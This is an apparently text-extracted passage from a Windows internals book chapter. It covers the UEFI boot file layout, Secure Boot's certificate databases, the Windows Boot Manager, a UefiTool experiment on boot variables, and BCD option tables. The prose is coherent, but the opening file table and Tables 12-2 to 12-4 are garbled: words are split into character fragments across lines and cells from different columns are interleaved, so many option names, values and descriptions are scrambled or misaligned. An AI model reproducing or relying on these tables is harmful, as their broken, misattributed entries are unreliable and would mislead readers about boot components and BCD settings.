Me
mt
est.
efi
If selected from the Boot Immersive Menu (or from the Boot
Manager), starts up and provides a graphical interface for
scanning memory and detecting damaged RAM.
E
FI
sy
ste
m
pa
rti
tio
n
Hv
If detected by the boot manager and properly enabled, this
W
Hv
loa
der
.dll
If detected by the boot manager and properly enabled, this
module is the hypervisor launcher (hvloader.efi in the
previous Windows version).
W
in
do
ws
bo
ot
pa
rti
tio
n
Hv
ix6
4.e
xe
(or
hva
x6
4.e
xe)
The Windows Hypervisor (Hyper-V). Depending on the
processor architecture, this file could have different names.
It’s the basic component for Virtualization Based Security
(VBS).
W
in
do
ws
bo
ot
pa
rti
tio
n
Nt
osk
rnl.
exe
Initializes executive subsystems and boot and system-start
device drivers, prepares the system for running native
applications, and runs Smss.exe.
W
in
do
ws
bo
ot
pa
rti
tio
n
Sec
ure
ker
The Windows Secure Kernel. Provides the kernel mode
services for the secure VTL 1 World, and some basic
communication facility with the normal world (see Chapter
W
in
do
nel
.ex
e
9, “Virtualization Technologies”).
ws
bo
ot
pa
rti
tio
n
Hal
.dll
Kernel-mode DLL that interfaces Ntoskrnl and drivers to the
hardware. It also acts as a driver for the motherboard,
supporting soldered components that are not otherwise
managed by another driver.
W
in
do
ws
bo
ot
pa
rti
tio
n
Sm
ss.
exe
Initial instance starts a copy of itself to initialize each
session. The session 0 instance loads the Windows
subsystem driver (Win32k.sys) and starts the Windows
subsystem process (Csrss.exe) and Windows initialization
process (Wininit.exe). All other per-session instances start a
Csrss and Winlogon process.
W
in
do
ws
bo
ot
pa
rti
tio
n
Wi
nin
it.e
xe
Starts the service control manager (SCM), the Local
Security Authority process (LSASS), and the local session
manager (LSM). Initializes the rest of the registry and
performs usermode
initialization tasks.
W
in
do
ws
bo
ot
pa
rti
tio
n
Wi
nlo
go
n.e
xe
Coordinates log-on and user security; launches Bootim and
LogonUI.
W
in
do
ws
bo
ot
pa
rti
tio
n
Lo
go
nui
.ex
e
Presents interactive log on dialog screen.
W
in
do
ws
bo
ot
pa
rti
tio
n
Bo
oti
m.
exe
Presents the graphical interactive boot menu.
W
in
do
ws
bo
ot
pa
rti
tio
n
Ser
vic
es.
exe
Loads and initializes auto-start device drivers and Windows
services.
W
in
do
ws
bo
ot
pa
rti
tio
n
Tc
bL
aun
ch.
exe
Orchestrates the Secure Launch of the operating system in a
system that supports the new Intel TXT technology.
W
in
do
ws
bo
ot
pa
rti
tio
n
Tc
bL
oad
er.
dll
Contains the Windows Loader code that runs in the context
of the Secure Launch.
W
in
do
ws
bo
ot
pa
rti
tio
n
Figure 12-2 Sample UEFI hard disk layout.
Another of Setup’s roles is to prepare the BCD, which on UEFI systems is
stored in the \EFI\Microsoft\Boot\BCD file on the root directory of the
system volume. This file contains options for starting the version of
Windows that Setup installs and any preexisting Windows installations. If the
BCD already exists, the Setup program simply adds new entries relevant to
the new installation. For more information on the BCD, see Chapter 10,
“Management, diagnostics, and tracing.”
All the UEFI specifications, which include the PEI and BDS phase, secure
boot, and many other concepts, are available at https://uefi.org/specifications.
The BIOS boot process
Due to space issues, we don’t cover the old BIOS boot process in this edition
of the book. The complete description of the BIOS preboot and boot process
is in Part 2 of the previous edition of the book.
Secure Boot
As described in Chapter 7 of Part 1, Windows was designed to protect against
malware. All the old BIOS systems were vulnerable to Advanced Persistent
Threats (APT) that were using a bootkit to achieve stealth and code
execution. The bootkit is a particular type of malicious software that runs
before the Windows Boot Manager and allows the main infection module to
run without being detected by antivirus solutions. Initial parts of the BIOS
bootkit normally reside in the Master Boot Record (MBR) or Volume Boot
Record (VBR) sector of the system hard disk. In this way, the old BIOS
systems, when switched on, execute the bootkit code instead of the main OS
code. The OS original boot code is encrypted and stored in other areas of the
hard disk and is usually executed in a later stage by the malicious code. This
type of bootkit was even able to modify the OS code in memory during any
Windows boot phase.
As demonstrated by security researchers, the first releases of the UEFI
specification were still vulnerable to this problem because the firmware,
bootloader, and other components were not verified. So, an attacker that has
access to the machine could tamper with these components and replace the
bootloader with a malicious one. Indeed, any EFI application (executable
files that follow the portable executable or terse executable file format)
correctly registered in the relative boot variable could have been used for
booting the system. Furthermore, even the DXE drivers were not correctly
verified, allowing the injection of a malicious EFI driver in the SPI flash.
Windows couldn’t correctly identify the alteration of the boot process.
This problem led the UEFI consortium to design and develop the secure
boot technology. Secure Boot is a feature of UEFI that ensures that each
component loaded during the boot process is digitally signed and validated.
Secure Boot makes sure that the PC boots using only software that is trusted
by the PC manufacturer or the user. In Secure Boot, the firmware is
responsible for the verification of all the components (DXE drivers, UEFI
boot managers, loaders, and so on) before they are loaded. If a component
doesn’t pass the validation, an error message is shown to the user and the
boot process is aborted.
The verification is performed through the use of public key algorithms
(like RSA) for digital signing, against a database of accepted and refused
certificates (or hashes) present in the UEFI firmware. In these kind of
algorithms, two different keys are employed:
■ A public key is used to decrypt an encrypted digest (a digest is a hash
of the executable file binary data). This key is stored in the digital
signature of the file.
■ The private key is used to encrypt the hash of the binary executable
file and is stored in a secure and secret location. The digital signing of
an executable file consists of three phases:
1.
Calculate the digest of the file content using a strong hashing
algorithm, like SHA256. A strong “hashing” should produce a
message digest that is a unique (and relatively small)
representation of the complete initial data (a bit like a
sophisticated checksum). Hashing algorithms are a one-way
encryption—that is, it’s impossible to derive the whole file from
the digest.
2.
Encrypt the calculated digest with the private portion of the key.
3.
Store the encrypted digest, the public portion of the key, and the
name of the hashing algorithm in the digital signature of the file.
In this way, when the system wants to verify and validate the integrity of
the file, it recalculates the file hash and compares it against the digest, which
has been decrypted from the digital signature. Nobody except the owner of
the private key can modify or alter the encrypted digest stored into the digital
signature.
This simplified model can be extended to create a chain of certificates,
each one trusted by the firmware. Indeed, if a public key located in a specific
certificate is unknown by the firmware, but the certificate is signed another
time by a trusted entity (an intermediate or root certificate), the firmware
could assume that even the inner public key must be considered trusted. This
mechanism is shown in Figure 12-3 and is called the chain of trust. It relies
on the fact that a digital certificate (used for code signing) can be signed
using the public key of another trusted higher-level certificate (a root or
intermediate certificate). The model is simplified here because a complete
description of all the details is outside the scope of this book.
Figure 12-3 A simplified representation of the chain of trust.
The allowed/revoked UEFI certificates and hashes have to establish some
hierarchy of trust by using the entities shown in Figure 12-4, which are stored
in UEFI variables:
■ Platform key (PK) The platform key represents the root of trust and
is used to protect the key exchange key (KEK) database. The platform
vendor puts the public portion of the PK into UEFI firmware during
manufacturing. Its private portion stays with the vendor.
■ Key exchange key (KEK) The key exchange key database contains
trusted certificates that are allowed to modify the allowed signature
database (DB), disallowed signature database (DBX), or timestamp
signature database (DBT). The KEK database usually contains
certificates of the operating system vendor (OSV) and is secured by
the PK.
Hashes and signatures used to verify bootloaders and other pre-boot
components are stored in three different databases. The allowed signature
database (DB) contains hashes of specific binaries or certificates (or their
hashes) that were used to generate code-signing certificates that have signed
bootloader and other preboot components (following the chain of trust
model). The disallowed signature database (DBX) contains the hashes of
specific binaries or certificates (or their hashes) that were compromised
and/or revoked. The timestamp signature database (DBT) contains
timestamping certificates used when signing bootloader images. All three
databases are locked from editing by the KEK.
Figure 12-4 The certificate the chain of trust used in the UEFI Secure
Boot.
To properly seal Secure Boot keys, the firmware should not allow their
update unless the entity attempting the update can prove (with a digital
signature on a specified payload, called the authentication descriptor) that
they possess the private part of the key used to create the variable. This
mechanism is implemented in UEFI through the Authenticated Variables. At
the time of this writing, the UEFI specifications allow only two types of
signing keys: X509 and RSA2048. An Authenticated Variable may be
cleared by writing an empty update, which must still contain a valid
authentication descriptor. When an Authenticated Variable is first created, it
stores both the public portion of the key that created it and the initial value
for the time (or a monotonic count) and will accept only subsequent updates
signed with that key and which have the same update type. For example, the
KEK variable is created using the PK and can be updated only by an
authentication descriptor signed with the PK.
Note
The way in which the UEFI firmware uses the Authenticated Variables in
Secure Boot environments could lead to some confusion. Indeed, only the
PK, KEK, and signatures databases are stored using Authenticated
Variables. The other UEFI boot variables, which store boot configuration
data, are still regular runtime variables. This means that in a Secure Boot
environment, a user is still able to update or change the boot configuration
(modifying even the boot order) without any problem. This is not an
issue, because the secure verification is always made on every kind of
boot application (regardless of its source or order). Secure Boot is not
designed to prevent the modification of the system boot configuration.
The Windows Boot Manager
As discussed previously, the UEFI firmware reads and executes the Windows
Boot Manager (Bootmgfw.efi). The EFI firmware transfers control to
Bootmgr in long mode with paging enabled, and the memory space defined
by the UEFI memory map is mapped one to one. So, unlike wBIOS systems,
there’s no need to switch execution context. The Windows Boot Manager is
indeed the first application that’s invoked when starting or resuming the
Windows OS from a completely off power state or from hibernation
(S4 power state). The Windows Boot Manager has been completely
redesigned starting from Windows Vista, with the following goals:
■ Support the boot of different operating systems that employ complex
and various boot technologies.
■ Separate the OS-specific startup code in its own boot application
(named Windows Loader) and the Resume application (Winresume).
■ Isolate and provide common boot services to the boot applications.
This is the role of the boot libraries.
Even though the final goal of the Windows Boot Manager seems obvious,
its entire architecture is complex. From now on, we use the term boot
application to refer to any OS loader, such as the Windows Loader and other
loaders. Bootmgr has multiple roles, such as the following:
■ Initializes the boot logger and the basic system services needed for the
boot application (which will be discussed later in this section)
■ Initializes security features like Secure Boot and Measured Boot,
loads their system policies, and verifies its own integrity
■ Locates, opens, and reads the Boot Configuration Data store
■ Creates a “boot list” and shows a basic boot menu (if the boot menu
policy is set to Legacy)
■ Manages the TPM and the unlock of BitLocker-encrypted drives
(showing the BitLocker unlock screen and providing a recovery
method in case of problems getting the decryption key)
■ Launches a specific boot application and manages the recovery
sequence in case the boot has failed (Windows Recovery
Environment)
One of the first things performed is the configuration of the boot logging
facility and initialization of the boot libraries. Boot applications include a
standard set of libraries that are initialized at the start of the Boot Manager.
Once the standard boot libraries are initialized, then their core services are
available to all boot applications. These services include a basic memory
manager (that supports address translation, and page and heap allocation),
firmware parameters (like the boot device and the boot manager entry in the
BCD), an event notification system (for Measured Boot), time, boot logger,
crypto modules, the Trusted Platform Module (TPM), network, display
driver, and I/O system (and a basic PE Loader). The reader can imagine the
boot libraries as a special kind of basic hardware abstraction layer (HAL) for
the Boot Manager and boot applications. In the early stages of library
initialization, the System Integrity boot library component is initialized. The
goal of the System Integrity service is to provide a platform for reporting and
recording security-relevant system events, such as loading of new code,
attaching a debugger, and so on. This is achieved using functionality
provided by the TPM and is used especially for Measured Boot. We describe
this feature later in the chapter in the “Measured Boot” section.
To properly execute, the Boot Manager initialization function (BmMain)
needs a data structure called Application Parameters that, as the name
implies, describes its startup parameters (like the Boot Device, BCD object
GUID, and so on). To compile this data structure, the Boot Manager uses the
EFI firmware services with the goal of obtaining the complete relative path
of its own executable and getting the startup load options stored in the active
EFI boot variable (BOOT000X). The EFI specifications dictate that an EFI
boot variable must contain a short description of the boot entry, the complete
device and file path of the Boot Manager, and some optional data. Windows
uses the optional data to store the GUID of the BCD object that describes
itself.
Note
The optional data could include any other boot options, which the Boot
Manager will parse at later stages. This allows the configuration of the
Boot Manager from UEFI variables without using the Windows Registry
at all.
EXPERIMENT: Playing with the UEFI boot variables
You can use the UefiTool utility (found in this book’s
downloadable resources) to dump all the UEFI boot variables of
your system. To do so, just run the tool in an administrative
command prompt and specify the /enum command-line parameter.
(You can launch the command prompt as administrator by
searching cmd in the Cortana search box and selecting Run As
Administrator after right-clicking Command Prompt.) A regular
system uses a lot of UEFI variables. The tool supports filtering all
the variables by name and GUID. You can even export all the
variable names and data in a text file using the /out parameter.
Start by dumping all the UEFI variables in a text file:
Click here to view code image
C:\Tools>UefiTool.exe /enum /out Uefi_Variables.txt
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
Successfully written “Uefi_Variables.txt” file.
You can get the list of UEFI boot variables by using the
following filter:
Click here to view code image
C:\Tools>UefiTool.exe /enum Boot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
EFI Variable “BootCurrent”
Guid : {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x06 ( BS RT )
Data size : 2 bytes
Data:
00 00 |
EFI Variable “Boot0002”
Guid : {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 78 bytes
Data:
01 00 00 00 2C 00 55 00 53 00 42 00 20 00 53 00 | , U
S B S
74 00 6F 00 72 00 61 00 67 00 65 00 00 00 04 07 | t o r a
g e
14 00 67 D5 81 A8 B0 6C EE 4E 84 35 2E 72 D3 3E | g ü¿ ⌉
Nä5.r >
45 B5 04 06 14 00 71 00 67 50 8F 47 E7 4B AD 13 | E q
gPÅG K¡
87 54 F3 79 C6 2F 7F FF 04 00 55 53 42 00 | çT≤y /
USB
EFI Variable “Boot0000”
Guid : {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 300 bytes
Data:
01 00 00 00 74 00 57 00 69 00 6E 00 64 00 6F 00 | t W
I n d o
77 00 73 00 20 00 42 00 6F 00 6F 00 74 00 20 00 | w s B
o o t
4D 00 61 00 6E 00 61 00 67 00 65 00 72 00 00 00 | M a n a
g e r
04 01 2A 00 02 00 00 00 00 A0 0F 00 00 00 00 00 | * á
00 98 0F 00 00 00 00 00 84 C4 AF 4D 52 3B 80 44 | ÿ
ä »MR;ÇD
98 DF 2C A4 93 AB 30 B0 02 02 04 04 46 00 5C 00 | ÿ
,ñô½0 F \
45 00 46 00 49 00 5C 00 4D 00 69 00 63 00 72 00 | E F I \
M i c r
6F 00 73 00 6F 00 66 00 74 00 5C 00 42 00 6F 00 | o s o f
t \ B o
6F 00 74 00 5C 00 62 00 6F 00 6F 00 74 00 6D 00 | o t \ b
o o t m
67 00 66 00 77 00 2E 00 65 00 66 00 69 00 00 00 | g f w .
e f i
7F FF 04 00 57 49 4E 44 4F 57 53 00 01 00 00 00 |
WINDOWS
88 00 00 00 78 00 00 00 42 00 43 00 44 00 4F 00 | ê x
B C D O
42 00 4A 00 45 00 43 00 54 00 3D 00 7B 00 39 00 | B J E C
T = { 9
64 00 65 00 61 00 38 00 36 00 32 00 63 00 2D 00 | d e a 8
6 2 c -
35 00 63 00 64 00 64 00 2D 00 34 00 65 00 37 00 | 5 c d d
- 4 e 7
30 00 2D 00 61 00 63 00 63 00 31 00 2D 00 66 00 | 0 - a c
c 1 - f
33 00 32 00 62 00 33 00 34 00 34 00 64 00 34 00 | 3 2 b 3
4 4 d 4
37 00 39 00 35 00 7D 00 00 00 6F 00 01 00 00 00 | 7 9 5 }
o
10 00 00 00 04 00 00 00 7F FF 04 00 |
EFI Variable "BootOrder"
Guid : {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 8 bytes
Data:
02 00 00 00 01 00 03 00 |
<Full output cut for space reasons>
The tool can even interpret the content of each boot variable.
You can launch it using the /enumboot parameter:
Click here to view code image
C:\Tools>UefiTool.exe /enumboot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
System Boot Configuration
Number of the Boot entries: 4
Current active entry: 0
Order: 2, 0, 1, 3
Boot Entry #2
Type: Active
Description: USB Storage
Boot Entry #0
Type: Active
Description: Windows Boot Manager
Path: Harddisk0\Partition2 [LBA:
0xFA000]\\EFI\Microsoft\Boot\bootmgfw.efi
OS Boot Options: BCDOBJECT={9dea862c-5cdd-4e70-acc1-
f32b344d4795}
Boot Entry #1
Type: Active
Description: Internal Storage
Boot Entry #3
Type: Active
Description: PXE Network
When the tool is able to parse the boot path, it prints the relative
Path line (the same applies for the Winload OS load options). The
UEFI specifications define different interpretations for the path
field of a boot entry, which are dependent on the hardware
interface. You can change your system boot order by simply setting
the value of the BootOrder variable, or by using the /setbootorder
command-line parameter. Keep in mind that this could invalidate
the BitLocker Volume master key. (We explain this concept later
in this chapter in the “Measured Boot” section):
Click here to view code image
C:\Tools>UefiTool.exe /setvar bootorder {8BE4DF61-93CA-11D2-
AA0D-00E098032B8C}
0300020000000100
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: YES
Warning, The "bootorder" firmware variable already exist.
Overwriting it could potentially invalidate the system
Bitlocker Volume Master Key.
Make sure that you have made a copy of the System volume
Recovery Key.
Are you really sure that you would like to continue and
overwrite its content? [Y/N] y
The "bootorder" firmware variable has been successfully
written.
After the Application Parameters data structure has been built and all the
boot paths retrieved (\EFI\Microsoft\Boot is the main working directory), the
Boot Manager opens and parses the Boot Configuration Data file. This file
internally is a registry hive that contains all the boot application descriptors
and is usually mapped in an HKLM\BCD00000000 virtual key after the
system has completely started. The Boot Manager uses the boot library to
open and read the BCD file. The library uses EFI services to read and write
physical sectors from the hard disk and, at the time of this writing,
implements a light version of various file systems, such as NTFS, FAT,
ExFAT, UDFS, El Torito, and virtual file systems that support Network Boot
I/O, VMBus I/O (for Hyper-V virtual machines), and WIM images I/O. The
Boot Configuration Data hive is parsed, the BCD object that describes the
Boot Manager is located (through its GUID), and all the entries that represent
boot arguments are added to the startup section of the Application Parameters
data structure. Entries in the BCD can include optional arguments that
Bootmgr, Winload, and other components involved in the boot process
interpret. Table 12-2 contains a list of these options and their effects for
Bootmgr, Table 12-3 shows a list of BCD options available to all boot
applications, and Table 12-4 shows BCD options for the Windows boot
loader. Table 12-5 shows BCD options that control the execution of the
Windows Hypervisor.
Table 12-2 BCD options for the Windows Boot Manager (Bootmgr)
Reada
ble
name
V
a
l
u
e
s
BCD
Element
Code1
Meaning
bcdfile
path
P
at
h
BCD_FILE
PATH
Points to the BCD (usually \Boot\BCD)
file on the disk.
display
bootm
enu
B
o
o
le
a
DISPLAY_
BOOT_ME
NU
Determines whether the Boot Manager
shows the boot menu or picks the default
entry automatically.
n
noerror
display
B
o
o
le
a
n
NO_ERRO
R_DISPLA
Y
Silences the output of errors encountered
by the Boot Manager.
resume
B
o
o
le
a
n
ATTEMPT_
RESUME
Specifies whether resuming from
hibernation should be attempted. This
option is automatically set when
Windows hibernates.
timeou
t
S
e
c
o
n
d
s
TIMEOUT
Number of seconds that the Boot Manager
should wait before choosing the default
entry.
resume
object
G
U
I
D
RESUME_
OBJECT
Identifier for which boot application
should be used to resume the system after
hibernation.
display
order
L
is
t
DISPLAY_
ORDER
Definition of the Boot Manager’s display
order list.
toolsdi
splayor
der
L
is
t
TOOLS_DI
SPLAY_OR
DER
Definition of the Boot Manager’s tool
display order list.
bootse
quence
L
is
t
BOOT_SEQ
UENCE
Definition of the one-time boot sequence.
default
G
U
I
D
DEFAULT_
OBJECT
The default boot entry to launch.
custom
actions
L
is
t
CUSTOM_
ACTIONS_
LIST
Definition of custom actions to take when
a specific keyboard sequence has been
entered.
proces
scusto
mactio
nsfirst
B
o
o
le
a
n
PROCESS_
CUSTOM_
ACTIONS_
FIRST
Specifies whether the Boot Manager
should run custom actions prior to the
boot sequence.
bcddev
ice
G
U
I
D
BCD_DEVI
CE
Device ID of where the BCD store is
located.
hiberb
oot
B
o
o
le
a
n
HIBERBOO
T
Indicates whether this boot was a hybrid
boot.
fverec
overyu
rl
S
tr
i
FVE_RECO
VERY_UR
L
Specifies the BitLocker recovery URL
string.
n
g
fverec
overy
messag
e
S
tr
i
n
g
FVE_RECO
VERY_ME
SSAGE
Specifies the BitLocker recovery message
string.
flighte
dboot
mgr
B
o
o
le
a
n
BOOT_FLI
GHT_BOO
TMGR
Specifies whether execution should
proceed through a flighted Bootmgr.
1 All the Windows Boot Manager BCD element codes start with BCDE_BOOTMGR_TYPE, but
that has been omitted due to limited space.
Table 12-3 BCD library options for boot applications (valid for all object
types)
R
e
a
d
a
bl
e
N
a
m
e
Val
ues
BCD
Elemen
t Code2
Meaning
a
d
Bool
ean
DISPL
AY_AD
If false, executes the default behavior of
launching the auto-recovery command boot
v
a
n
ce
d
o
pt
io
ns
VANCE
D_OPTI
ONS
entry when the boot fails; otherwise, displays
the boot error and offers the user the advanced
boot option menu associated with the boot entry.
This is equivalent to pressing F8.
a
v
oi
dl
o
w
m
e
m
or
y
Inte
ger
AVOID
_LOW_
PHYSI
CAL_M
EMOR
Y
Forces physical addresses below the specified
value to be avoided by the boot loader as much
as possible. Sometimes required on legacy
devices (such as ISA) where only memory
below 16 MB is usable or visible.
b
a
d
m
e
m
or
y
ac
ce
ss
Bool
ean
ALLO
W_BA
D_ME
MORY
_ACCE
SS
Forces usage of memory pages in the Bad Page
List (see Part 1, Chapter 5, “Memory
management,” for more information on the page
lists).
b
a
Arra
y of
BAD_
MEMO
Specifies a list of physical pages on the system
that are known to be bad because of faulty
d
m
e
m
or
yl
is
t
page
fram
e
num
bers
(PF
Ns)
RY_LIS
T
RAM.
b
a
u
dr
at
e
Bau
d
rate
in
bps
DEBUG
GER_B
AUDR
ATE
Specifies an override for the default baud rate
(19200) at which a remote kernel debugger host
will connect through a serial port.
b
o
ot
d
e
b
u
g
Bool
ean
DEBUG
GER_E
NABLE
D
Enables remote boot debugging for the boot
loader. With this option enabled, you can use
Kd.exe or Windbg.exe to connect to the boot
loader.
b
o
ot
e
m
s
Bool
ean
EMS_E
NABLE
D
Causes Windows to enable Emergency
Management Services (EMS) for boot
applications, which reports boot information and
accepts system management commands through
a serial port.
b
us
p
ar
Strin
g
DEBUG
GER_B
US_PA
RAME
If a physical PCI debugging device is used to
provide kernel debugging, specifies the PCI bus,
function, and device number (or the ACPI DBG
table index) for the device.
a
m
s
TERS
c
h
a
n
n
el
Cha
nnel
betw
een
0
and
62
DEBUG
GER_1
394_CH
ANNEL
Used in conjunction with <debugtype> 1394 to
specify the IEEE 1394 channel through which
kernel debugging communications will flow.
c
o
nf
ig
ac
ce
ss
p
ol
ic
y
Defa
ult,
Disa
llow
Mm
Conf
ig
CONFI
G_ACC
ESS_P
OLICY
Configures whether the system uses memory-
mapped I/O to access the PCI manufacturer’s
configuration space or falls back to using the
HAL’s I/O port access routines. Can sometimes
be helpful in solving platform device problems.
d
e
b
u
g
a
d
dr
es
s
Hard
ware
addr
ess
DEBUG
GER_P
ORT_A
DDRES
S
Specifies the hardware address of the serial
(COM) port used for debugging.
d
e
b
u
g
p
or
t
CO
M
port
num
ber
DEBUG
GER_P
ORT_N
UMBE
R
Specifies an override for the default serial port
(usually COM2 on systems with at least two
serial ports) to which a remote kernel debugger
host is connected.
d
e
b
u
gs
ta
rt
Acti
ve,
Auto
Ena
ble,
Disa
ble
DEBUG
GER_S
TART_
POLIC
Y
Specifies settings for the debugger when kernel
debugging is enabled. AutoEnable enables the
debugger when a breakpoint or kernel
exception, including kernel crashes, occurs.
d
e
b
u
gt
y
p
e
Seri
al,
1394
,
USB
, or
Net
DEBUG
GER_T
YPE
Specifies whether kernel debugging will be
communicated through a serial, FireWire (IEEE
1394), USB, or Ethernet port. (The default is
serial.)
h
os
ti
p
Ip
addr
ess
DEBUG
GER_N
ET_HO
ST_IP
Specifies the target IP address to connect to
when the kernel debugger is enabled through
Ethernet.
p
or
t
Inte
ger
DEBUG
GER_N
ET_PO
RT
Specifies the target port number to connect to
when the kernel debugger is enabled through
Ethernet.
k
e
y
Strin
g
DEBUG
GER_N
ET_KE
Y
Specifies the encryption key used for encrypting
debugger packets while using the kernel
Debugger through Ethernet.
e
m
sb
a
u
dr
at
e
Bau
d
rate
in
bps
EMS_B
AUDR
ATE
Specifies the baud rate to use for EMS.
e
m
sp
or
t
CO
M
port
num
ber
EMS_P
ORT_N
UMBE
R
Specifies the serial (COM) port to use for EMS.
e
xt
e
n
d
e
di
n
p
ut
Bool
ean
CONSO
LE_EX
TENDE
D_INP
UT
Enables boot applications to leverage BIOS
support for extended console input.
k
e
yr
in
g
Phys
ical
addr
ess
FVE_K
EYRIN
G_ADD
RESS
Specifies the physical address where the
BitLocker key ring is located.
a
d
dr
es
s
fi
rs
t
m
e
g
a
b
yt
e
p
ol
ic
y
Use
Non
e,
Use
All,
Use
Priv
ate
FIRST_
MEGA
BYTE_
POLIC
Y
Specifies how the low 1 MB of physical
memory is consumed by the HAL to mitigate
corruptions by the BIOS during power
transitions.
fo
nt
p
at
h
Strin
g
FONT_
PATH
Specifies the path of the OEM font that should
be used by the boot application.
gr
a
p
hi
cs
m
o
d
e
Bool
ean
GRAPH
ICS_M
ODE_D
ISABL
ED
Disables graphics mode for boot applications.
di
sa
bl
e
d
gr
a
p
hi
cs
re
so
lu
ti
o
n
Reso
lutio
n
GRAPH
ICS_RE
SOLUT
ION
Sets the graphics resolution for boot
applications.
in
iti
al
c
o
ns
ol
ei
n
p
ut
Bool
ean
INITIA
L_CON
SOLE_I
NPUT
Specifies an initial character that the system
inserts into the PC/ AT keyboard input buffer.
in
te
gr
it
ys
er
Defa
ult,
Disa
ble,
Ena
ble
SI_POL
ICY
Enables or disables code integrity services,
which are used by Kernel Mode Code Signing.
Default is Enabled.
vi
ce
s
lo
ca
le
Loca
lizati
on
strin
g
PREFE
RRED_
LOCAL
E
Sets the locale for the boot application (such as
EN-US).
n
o
u
m
e
x
Bool
ean
DEBUG
GER_I
GNORE
_USER
MODE_
EXCEP
TIONS
Disables user-mode exceptions when kernel
debugging is enabled. If you experience system
hangs (freezes) when booting in debugging
mode, try enabling this option.
re
c
o
v
er
y
e
n
a
bl
e
d
Bool
ean
AUTO_
RECOV
ERY_E
NABLE
D
Enables the recovery sequence, if any. Used by
fresh installations of Windows to present the
Windows PE-based Startup And Recovery
interface.
re
c
o
v
er
List
RECOV
ERY_S
EQUEN
CE
Defines the recovery sequence (described
earlier).
ys
e
q
u
e
n
ce
re
lo
ca
te
p
h
ys
ic
al
Phys
ical
addr
ess
RELOC
ATE_P
HYSIC
AL_ME
MORY
Relocates an automatically selected NUMA
node’s physical memory to the specified
physical address.
ta
rg
et
n
a
m
e
Strin
g
DEBUG
GER_U
SB_TA
RGETN
AME
Defines the target name for the USB debugger
when used with USB2 or USB3 debugging
(debugtype is set to USB).
te
st
si
g
ni
n
g
Bool
ean
ALLO
W_PRE
RELEA
SE_SIG
NATUR
ES
Enables test-signing mode, which allows driver
developers to load locally signed 64-bit drivers.
This option results in a watermarked desktop.
tr
u
Add
ress
TRUNC
ATE_P
Disregards physical memory above the specified
physical address.
n
ca
te
m
e
m
or
y
in
byte
s
HYSIC
AL_ME
MORY
2 All the BCD elements codes for Boot Applications start with BCDE_LIBRARY_TYPE, but that
has been omitted due to limited space.
Table 12-4 BCD options for the Windows OS Loader (Winload)
B
C
D
E
le
m
e
n
t
Values
BC
D
Ele
men
t
Code
3
Meaning
b
o
ot
lo
g
Boolean
LO
G_I
NIT
IAL
IZA
TIO
N
Causes Windows to write a log of the boot to the
file %SystemRoot%\Ntbtlog.txt.
b
o
ot
st
at
Display
AllFailu
res,
ignoreA
llFailur
BO
OT_
ST
AT
US_
Overrides the system’s default behavior of
offering the user a troubleshooting boot menu if
the system didn’t complete the previous boot or
shutdown.
u
s
p
ol
ic
y
es,
IgnoreS
hutdow
nFailure
s,
IgnoreB
ootFailu
res
PO
LIC
Y
b
o
ot
u
x
Disable
d,
Basic,
Standar
d
BO
OT
UX
_PO
LIC
Y
Defines the boot graphics user experience that
the user will see. Disabled means that no
graphics will be seen during boot time (only a
black screen), while Basic will display only a
progress bar during load. Standard displays the
usual Windows logo animation during boot.
b
o
ot
m
e
n
u
p
ol
ic
y
Legacy
Standar
d
BO
OT_
ME
NU
_PO
LIC
Y
Specify the type of boot menu to show in case of
multiple boot entries (see “The boot menu”
section later in this chapter).
cl
u
st
er
m
o
d
e
Number
of
process
ors
CL
US
TE
RM
OD
E_A
DD
RES
Defines the maximum number of processors to
include in a single Advanced Programmable
Interrupt Controller (APIC) cluster.
a
d
dr
es
si
n
g
SIN
G
c
o
nf
ig
fl
a
g
s
Flags
PR
OC
ESS
OR
_C
ON
FIG
UR
ATI
ON
_FL
AG
S
Specifies processor-specific configuration flags.
d
b
gt
ra
n
s
p
or
t
Transpo
rt image
name
DB
G_T
RA
NSP
OR
T_P
AT
H
Overrides using one of the default kernel
debugging transports (Kdcom.dll, Kd1394,
Kdusb.dll) and instead uses the given file,
permitting specialized debugging transports to be
used that are not typically supported by
Windows.
d
e
b
u
Boolean
KE
RN
EL_
DE
Enables kernel-mode debugging.
g
BU
GG
ER_
EN
AB
LE
D
d
et
e
ct
h
al
Boolean
DE
TE
CT_
KE
RN
EL_
AN
D_
HA
L
Enables the dynamic detection of the HAL.
dr
iv
er
lo
a
df
ai
lu
re
p
ol
ic
y
Fatal,
UseErro
rContro
l
DRI
VE
R_L
OA
D_F
AIL
UR
E_P
OLI
CY
Describes the loader behavior to use when a boot
driver has failed to load. Fatal will prevent
booting, whereas UseErrorControl causes the
system to honor a driver’s default error behavior,
specified in its service key.
e
m
s
Boolean
KE
RN
EL_
Instructs the kernel to use EMS as well. (If only
bootems is used, only the boot loader will use
EMS.)
EM
S_E
NA
BL
ED
e
v
st
or
e
String
EV
ST
OR
E
Stores the location of a boot preloaded hive.
gr
o
u
p
a
w
ar
e
Boolean
FO
RC
E_G
RO
UP_
AW
AR
EN
ESS
Forces the system to use groups other than zero
when associating the group seed to new
processes. Used only on 64-bit Windows.
gr
o
u
p
si
z
e
Integer
GR
OU
P_S
IZE
Forces the maximum number of logical
processors that can be part of a group (maximum
of 64). Can be used to force groups to be created
on a system that would normally not require
them to exist. Must be a power of 2 and is used
only on 64-bit Windows.
h
al
HAL
image
name
HA
L_P
AT
H
Overrides the default file name for the HAL
image (Hal.dll). This option can be useful when
booting a combination of a checked HAL and
checked kernel (requires specifying the kernel
element as well).
h
al
br
e
a
k
p
oi
nt
Boolean
DE
BU
GG
ER_
HA
L_B
RE
AK
POI
NT
Causes the HAL to stop at a breakpoint early in
HAL initialization. The first thing the Windows
kernel does when it initializes is to initialize the
